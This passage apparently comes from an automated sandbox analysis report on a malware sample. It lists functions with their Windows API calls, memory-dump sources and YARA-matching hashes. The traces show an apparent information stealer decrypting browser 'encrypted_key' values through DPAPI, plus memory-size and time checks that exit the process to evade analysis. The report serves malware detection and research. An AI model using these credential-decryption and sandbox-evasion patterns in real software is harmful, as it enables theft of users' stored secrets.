                                                  • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                                                  • Opcode Fuzzy Hash: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                                  • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
                                                  Function 02F01487 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 02F014A5
                                                  • __aulldiv.LIBCMT ref: 02F014BF
                                                  • __aulldiv.LIBCMT ref: 02F014CD
                                                  • ExitProcess.KERNEL32 ref: 02F014FB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                  • String ID: @
                                                  • API String ID: 3404098578-2766056989
                                                  • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                  • Instruction ID: 24695cecb5adce19e65b8ab280f36084ec39763365d126a31ea50eac34e85075
                                                  • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                  • Instruction Fuzzy Hash: AF016DB0D40308FAEF10DBD0CD89B9EBBB9AB01745F208448E7097B2C0D7B49541CB55
                                                  Function 02F0A077 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 167memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memcmp.MSVCRT(?,00421264,00000003), ref: 02F0A094
                                                    • Part of subcall function 02F1AA07: lstrcpy.KERNEL32(?,00000000), ref: 02F1AA4D
                                                    • Part of subcall function 02F10CC7: memset.MSVCRT ref: 02F10E83
                                                    • Part of subcall function 02F10CC7: lstrcat.KERNEL32(?,00000000), ref: 02F10E9C
                                                    • Part of subcall function 02F10CC7: lstrcat.KERNEL32(?,00420D7C), ref: 02F10EAE
                                                    • Part of subcall function 02F10CC7: lstrcat.KERNEL32(?,00000000), ref: 02F10EC4
                                                    • Part of subcall function 02F10CC7: lstrcat.KERNEL32(?,00420D80), ref: 02F10ED6
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                  • memcmp.MSVCRT(?,00421114,00000003), ref: 02F0A116
                                                  • memset.MSVCRT ref: 02F0A14F
                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 02F0A1A8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                                  • String ID: @
                                                  • API String ID: 1977917189-2766056989
                                                  • Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                                  • Instruction ID: 39b13e8e67edf94d0a1295c51993cac6dd0ad7e54c47c29ad2f8f812f79ae62f
                                                  • Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                                  • Instruction Fuzzy Hash: 29613B31A00248EBCB28EFA4CD95FED7776AF44744F808118EB0AAB5D0EB746A45CF51
                                                  Function 00410D90 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • strtok_s.MSVCRT ref: 00410DB8
                                                  • strtok_s.MSVCRT ref: 00410EFD
                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02D45BB0,?,0042110C,?,00000000), ref: 0041A82B
                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strtok_s$lstrcpylstrlen
                                                  • String ID:
                                                  • API String ID: 348468850-0
                                                  • Opcode ID: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                                  • Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
                                                  • Opcode Fuzzy Hash: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                                  • Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95
                                                  Function 00409CE0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                    • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                    • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                  • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                                    • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                                    • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                                    • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                                    • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                                  • String ID: $"encrypted_key":"$DPAPI
                                                  • API String ID: 3731072634-738592651
                                                  • Opcode ID: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                                  • Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
                                                  • Opcode Fuzzy Hash: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                                  • Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
                                                  Function 02F1CDA0 Relevance: 7.6, APIs: 5, Instructions: 94COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CodeInfoPageValidmemset
                                                  • String ID:
                                                  • API String ID: 703783727-0
                                                  • Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                                  • Instruction ID: 4acae3c0ca24b7fc485e41f7ed0715f0c4eae3efeb5cce2e25da74cf24042232
                                                  • Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                                  • Instruction Fuzzy Hash: 8D31F631E842919EDB268F75CC94379BFA09F06394B8881ABDA82CF192C368C405C763
                                                  Function 02F16B87 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetSystemTime.KERNEL32(?), ref: 02F16BD3
                                                  • sscanf.NTDLL ref: 02F16C00
                                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 02F16C19
                                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 02F16C27
                                                  • ExitProcess.KERNEL32 ref: 02F16C41
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Time$System$File$ExitProcesssscanf
                                                  • String ID:
                                                  • API String ID: 2533653975-0
                                                  • Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                                  • Instruction ID: d1d5fbeef4dcbd807cdd8e11e8ede4b7a768664693190800c8099744c312115b
                                                  • Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                                  • Instruction Fuzzy Hash: BC21E7B5D04209ABCB08EFE4D9459EEB7BAFF48301F44852EE506E3250EB345604CB65
                                                  Function 02F18067 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02F1809E
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02F180A5
                                                  • RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 02F180C5
                                                  • RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 02F180E6
                                                  • RegCloseKey.ADVAPI32(?), ref: 02F180F9
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                  • String ID:
                                                  • API String ID: 3225020163-0
                                                  • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                  • Instruction ID: 7fb30a3b94e4c00c74cbb48bf92a864cff030a43f8d0b2ac926a867ee9731bc0
                                                  • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                  • Instruction Fuzzy Hash: 91113DB6A84209BBE714DFD4DD4AFABBBB9EB05B50F104219F615A7280C77558008BA1
                                                  Function 00417E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00417E3E
                                                  • RegOpenKeyExA.ADVAPI32(80000002,02D42888,00000000,00020119,?), ref: 00417E5E
                                                  • RegQueryValueExA.ADVAPI32(?,02D49C10,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                                                  • RegCloseKey.ADVAPI32(?), ref: 00417E92
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                  • String ID:
                                                  • API String ID: 3466090806-0
                                                  • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                  • Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
                                                  • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                  • Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
                                                  Function 02F17987 Relevance: 7.5, APIs: 5, Instructions: 42registrymemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02F1799B
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02F179A2
                                                  • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,02F17920), ref: 02F179C2
                                                  • RegQueryValueExA.ADVAPI32(02F17920,00420AAC,00000000,00000000,?,000000FF), ref: 02F179E1
                                                  • RegCloseKey.ADVAPI32(02F17920), ref: 02F179EB
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                  • String ID:
                                                  • API String ID: 3225020163-0
                                                  • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                  • Instruction ID: 6d563ee23bd17f4bc91ab3c3c6c8fdd419ee71cb506ce7c207119c328b5510d8
                                                  • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                  • Instruction Fuzzy Hash: C301FFB9A80308BFEB10DFE4DD4AFAEB7B9EB48701F504559FA05A7280DB7596008F51
                                                  Function 00419260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • StrStrA.SHLWAPI(02D493C8,?,?,?,0041140C,?,02D493C8,00000000), ref: 0041926C
                                                  • lstrcpyn.KERNEL32(0064AB88,02D493C8,02D493C8,?,0041140C,?,02D493C8), ref: 00419290
                                                  • lstrlenA.KERNEL32(?,?,0041140C,?,02D493C8), ref: 004192A7
                                                  • wsprintfA.USER32 ref: 004192C7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpynlstrlenwsprintf
                                                  • String ID: %s%s
                                                  • API String ID: 1206339513-3252725368
                                                  • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                  • Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
                                                  • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                  • Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95
                                                  Function 02F01507 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02F0151B
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02F01522
                                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 02F0153E
                                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 02F0155C
                                                  • RegCloseKey.ADVAPI32(?), ref: 02F01566
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                  • String ID:
                                                  • API String ID: 3225020163-0
                                                  • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                  • Instruction ID: 179fe7dece98cc7c08ab46860e9156f284b8c1e3622b5a3dd571e494f8bb15dd
                                                  • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                  • Instruction Fuzzy Hash: ED01CDBDA40208BFDB14DFE4DC49FAEB7B9EB48705F108159FA0597280D6759A018F91
                                                  Function 004012A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                  • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                  • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                  • String ID:
                                                  • API String ID: 3466090806-0
                                                  • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                  • Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
                                                  • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                  • Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51
                                                  Function 02F1C9A9 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • __getptd.LIBCMT ref: 02F1C9B5
                                                    • Part of subcall function 02F1C206: __getptd_noexit.LIBCMT ref: 02F1C209
                                                    • Part of subcall function 02F1C206: __amsg_exit.LIBCMT ref: 02F1C216
                                                  • __getptd.LIBCMT ref: 02F1C9CC
                                                  • __amsg_exit.LIBCMT ref: 02F1C9DA
                                                  • __lock.LIBCMT ref: 02F1C9EA
                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 02F1C9FE
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                  • String ID:
                                                  • API String ID: 938513278-0
                                                  • Opcode ID: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                                  • Instruction ID: 5bde0dd2ac79e919cdfd4212b3bc08265a341b3ed5065a88642810daec09ea8c
                                                  • Opcode Fuzzy Hash: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                                  • Instruction Fuzzy Hash: 7DF06D32A802149BD725BBA89C1275D37A1AF007E8FD1010BD614AA1D0DB245540DF9B
                                                  Function 0041C742 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • __getptd.LIBCMT ref: 0041C74E
                                                    • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                                    • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                                  • __getptd.LIBCMT ref: 0041C765
                                                  • __amsg_exit.LIBCMT ref: 0041C773
                                                  • __lock.LIBCMT ref: 0041C783
                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                  • String ID:
                                                  • API String ID: 938513278-0
                                                  • Opcode ID: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                                  • Instruction ID: 4c6ecd523783b942696bdc62fd612c852c6eee159b5b032e672b771ca3e86784
                                                  • Opcode Fuzzy Hash: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                                  • Instruction Fuzzy Hash: B0F09632A813119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D28E9E
                                                  Function 00410740 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 217COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • StrCmpCA.SHLWAPI(00000000,02D45A70), ref: 0041079A
                                                  • StrCmpCA.SHLWAPI(00000000,02D45B10), ref: 00410866
                                                  • StrCmpCA.SHLWAPI(00000000,02D45B20), ref: 0041099D
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy
                                                  • String ID: `_A
                                                  • API String ID: 3722407311-2339250863
                                                  • Opcode ID: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                                  • Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
                                                  • Opcode Fuzzy Hash: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                                  • Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86
                                                  Function 00410765 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 197COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • StrCmpCA.SHLWAPI(00000000,02D45A70), ref: 0041079A
                                                  • StrCmpCA.SHLWAPI(00000000,02D45B10), ref: 00410866
                                                  • StrCmpCA.SHLWAPI(00000000,02D45B20), ref: 0041099D
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy
                                                  • String ID: `_A
                                                  • API String ID: 3722407311-2339250863
                                                  • Opcode ID: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                                  • Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
                                                  • Opcode Fuzzy Hash: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                                  • Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86
                                                  Function 02F16897 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
